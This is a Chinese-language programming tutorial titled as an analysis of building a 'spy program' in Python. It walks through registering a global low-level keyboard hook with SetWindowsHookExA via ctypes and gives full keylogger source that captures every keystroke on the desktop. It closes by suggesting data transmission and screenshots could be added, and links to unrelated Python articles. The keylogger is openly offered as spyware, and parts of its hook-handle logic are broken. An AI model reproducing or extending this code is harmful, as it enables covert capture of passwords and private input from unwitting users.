使用Python打造一款間諜程序的流程分析
知識(shí)點(diǎn)
這次我們使用python來打造一款間諜程序
程序中會(huì)用到許多知識(shí)點(diǎn),大致分為四塊
win32API 此處可以在MSDN上查看
Python基礎(chǔ)重點(diǎn)在cpytes庫的使用,使用方法請(qǐng)點(diǎn)擊此處
C語言基礎(chǔ)
Hook
程序的基本原理在于通過注冊(cè)Hook,記錄系統(tǒng)事件
那么什么是Hook呢
Hook 技術(shù)又叫做鉤子函數(shù),系統(tǒng)在調(diào)用函數(shù)之前,鉤子程序就先捕獲該消息,鉤子函數(shù)先得到控制權(quán),這時(shí)鉤子函數(shù)既可以加工處理(改變)該函數(shù)的執(zhí)行行為,還可以強(qiáng)制結(jié)束消息的傳遞
注冊(cè)Hook時(shí)我們需要先導(dǎo)入DLL庫,在Python中我們使用ctypes來導(dǎo)入,導(dǎo)入方法如下
user32 = CDLL("user32.dll") kernel32 = CDLL("kernel32.dll")
我們導(dǎo)入了user32.dll和kernel32.dll
這兩個(gè)DLL有什么用處呢
user32.dll 是Windows用戶界面相關(guān)應(yīng)用程序接口,用于包括Windows處理,基本用戶界面等特性,如創(chuàng)建窗口和發(fā)送消息
kernel32.dll 控制著系統(tǒng)的內(nèi)存管理、數(shù)據(jù)的輸入輸出操作和中斷處理
流程部分
知道了我們要使用什么樣的工具,那么第一步應(yīng)該怎么做呢
1.首先我們需要先注冊(cè)Hook到系統(tǒng)上,通過user32.dll中的SetWindowsHookExA函數(shù),我們可以在系統(tǒng)上注冊(cè)鉤子
HHOOK SetWindowsHookExA( int idHook, HOOKPROC lpfn, HINSTANCE hmod, DWORD dwThreadId );
通過查看文檔我們看到SetWindowsHookExA函數(shù)的參數(shù)及參數(shù)類型如上所示,詳細(xì)文檔點(diǎn)擊此鏈接查看
通過文檔我們看到第一個(gè)參數(shù)idHook中填入鉤子的類型
WH_KEYBOARD_LL的常量值為13代表的意思是監(jiān)視低級(jí)鍵盤輸入事件,我們此處來監(jiān)聽鍵盤事件
第二個(gè)參數(shù)lpfn代表指向鉤子過程的指針,要填入鉤子過程(函數(shù)),我們可以在此處來添加額外代碼達(dá)到我們想要達(dá)成的目的
第三個(gè)參數(shù)hmod表示為DLL句柄,我們可以使用kernel32中的GetModuleHandleW來獲取句柄
最后一個(gè)參數(shù)dwThreadId我們填入0代表與同一桌面上所有的線程關(guān)聯(lián)
代碼如下
user32.SetWindowsHookExA(13,handleProc,kernel32.GetModuleHandleW(),0)
如何使用Python來編寫我們的鉤子過程呢,通過ctypes文檔我們可以得知windows下使用WINFUNCTYPE來創(chuàng)建函數(shù)
此時(shí)我們發(fā)現(xiàn)有WINFUNCTYPE和CFUNCTYPE兩個(gè)函數(shù),具體要使用哪一個(gè)呢,這兩個(gè)的區(qū)別為
WINFUNCTYPE 為Windows下獨(dú)有的,通過使用使用stdcall調(diào)用約定的函數(shù)
CFUNCTYPE 使用標(biāo)準(zhǔn)C調(diào)用約定的函數(shù)
HOOKPROC = WINFUNCTYPE(c_int, c_int, c_int, POINTER(DWORD))
因?yàn)槲覀冋{(diào)用的是WH_KEYBOARD_LL,WH_KEYBOARD_LL會(huì)使用LowLevelKeyboardProc回調(diào)函數(shù),同時(shí)我們也需要在Python定義它
LowLevelKeyboardProc數(shù)據(jù)結(jié)構(gòu)如下
LRESULT CALLBACK LowLevelKeyboardProc( _In_ int nCode, _In_ WPARAM wParam, _In_ LPARAM lParam );
按照官方文檔提示如果nCode小于零,則掛鉤過程必須將消息傳遞給CallNextHookEx函數(shù),而無需進(jìn)一步處理,并且應(yīng)返回CallNextHookEx返回的值
我們轉(zhuǎn)換為Python代碼
class KBDLLHOOKSTRUCT(Structure): _fields_ = [ ('vkCode', DWORD), ('scanCode', DWORD), ('flags', DWORD), ('time', DWORD), ('dwExtraInfo', DWORD)] def hookProc(nCode, wParam, lParam): if nCode < 0: return user32.CallNextHookEx(hooked, nCode, wParam, lParam) else: # 此處插入我們的代碼 pass return user32.CallNextHookEx(hooked, nCode, wParam, lParam)
最后在我們退出程序時(shí)還需要?jiǎng)h除Hook,不然大量的Hook會(huì)使系統(tǒng)運(yùn)行緩慢,雖然在Windows 7及更高版本上,該鉤子會(huì)被靜默刪除而不被調(diào)用。應(yīng)用程序無法知道掛鉤是否已刪除。我們還是主動(dòng)進(jìn)行刪除
刪除需要使用user32.dll的UnhookWindowsHookEx,參數(shù)為Hook句柄
user32.UnhookWindowsHookEx(hooked)
下面貼上全部代碼
import sys from ctypes import * from ctypes.wintypes import DWORD, HHOOK, HINSTANCE, MSG, WPARAM, LPARAM user32 = CDLL("user32.dll") kernel32 = CDLL("kernel32.dll") class KBDLLHOOKSTRUCT(Structure): _fields_ = [ ('vkCode', DWORD), ('scanCode', DWORD), ('flags', DWORD), ('time', DWORD), ('dwExtraInfo', DWORD)] def uninstallHookProc(hooked): if hooked is None: return user32.UnhookWindowsHookEx(hooked) hooked = None def hookProc(nCode, wParam, lParam): if nCode < 0: return user32.CallNextHookEx(hooked, nCode, wParam, lParam) else: if wParam == 256: if 162 == lParam.contents.value: print("Ctrl pressed, call Hook uninstall()") uninstallHookProc(hooked) sys.exit(-1) capsLock = user32.GetKeyState(20) # kb_struct = cast(lParam, POINTER(KBDLLHOOKSTRUCT)) if lParam.contents.value==13: print("\n") elif capsLock: print(chr(lParam.contents.value),end="") else: print(chr(lParam.contents.value+32),end="") return user32.CallNextHookEx(hooked, nCode, wParam, lParam) def startKeyLog(): msg = MSG() user32.GetMessageA(byref(msg), 0, 0, 0) def installHookProc(hooked, pointer): hooked = user32.SetWindowsHookExA( 13, pointer, kernel32.GetModuleHandleW(), 0 ) if not hooked: return False return True HOOKPROC = WINFUNCTYPE(c_int, c_int, c_int, POINTER(DWORD)) pointer = HOOKPROC(hookProc) hooked = None if installHookProc(hooked, pointer): print("Hook installed") try: msg = MSG() user32.GetMessageA(byref(msg), 0, 0, 0) except KeyboardInterrupt as kerror: uninstallHookProc(hooked) print("Hook uninstall...") else: print("Hook installed error")
貼上我們的效果圖
我們還可以再添加上額外的代碼比如數(shù)據(jù)傳輸,截屏等等 ^_^
如何想要了解更多的只是請(qǐng)點(diǎn)擊這里把 => 地址
總結(jié)
以上就是使用Python打造一款間諜程序的流程分析的詳細(xì)內(nèi)容,更多關(guān)于python間諜程序請(qǐng)關(guān)注腳本之家其它相關(guān)文章!
相關(guān)文章
在python下實(shí)現(xiàn)word2vec詞向量訓(xùn)練與加載實(shí)例
這篇文章主要介紹了在python下實(shí)現(xiàn)word2vec詞向量訓(xùn)練與加載實(shí)例,具有很好的參考價(jià)值,希望對(duì)大家有所幫助。一起跟隨小編過來看看吧2020-06-06Django 解決新建表刪除后無法重新創(chuàng)建等問題
這篇文章主要介紹了Django 解決新建表刪除后無法重新創(chuàng)建等問題,具有很好的參考價(jià)值,希望對(duì)大家有所幫助。一起跟隨小編過來看看吧2020-05-05C語言中printf()函數(shù)的全面介紹及用法(簡單易懂)
在C語言中,printf()是常用的輸出函數(shù),包含在頭文件中,它使用格式控制字符串,其中包括格式字符、轉(zhuǎn)義字符和普通字符,格式字符以"%"開頭,文中將用法介紹的非常詳細(xì),需要的朋友可以參考下2024-09-09使用scrapy實(shí)現(xiàn)爬網(wǎng)站例子和實(shí)現(xiàn)網(wǎng)絡(luò)爬蟲(蜘蛛)的步驟
本文分二個(gè)示例,第一個(gè)是個(gè)簡單的爬網(wǎng)站的小例子,第二個(gè)例子實(shí)現(xiàn)目是從一個(gè)網(wǎng)站的列表頁抓取文章列表,然后存入數(shù)據(jù)庫中,數(shù)據(jù)庫包括文章標(biāo)題、鏈接、時(shí)間,大家參考使用吧2014-01-01Python實(shí)戰(zhàn)之用tkinter庫做一個(gè)鼠標(biāo)模擬點(diǎn)擊器
這篇文章主要介紹了Python實(shí)戰(zhàn)之用tkinter庫做一個(gè)鼠標(biāo)模擬點(diǎn)擊器,文中有非常詳細(xì)的代碼示例,對(duì)正在學(xué)習(xí)python的小伙伴們有非常好的幫助,需要的朋友可以參考下2021-04-04Pycharm學(xué)習(xí)教程(2) 代碼風(fēng)格
這篇文章主要為大家詳細(xì)介紹了最全的Pycharm學(xué)習(xí)教程第二篇代碼風(fēng)格,具有一定的參考價(jià)值,感興趣的小伙伴們可以參考一下2017-05-05Python中for循環(huán)語句實(shí)戰(zhàn)案例
這篇文章主要給大家介紹了關(guān)于Python中for循環(huán)語句的相關(guān)資料,python中for循環(huán)一般用來迭代字符串,列表,元組等,當(dāng)for循環(huán)用于迭代時(shí)不需要考慮循環(huán)次數(shù),循環(huán)次數(shù)由后面的對(duì)象長度來決定,需要的朋友可以參考下2023-09-09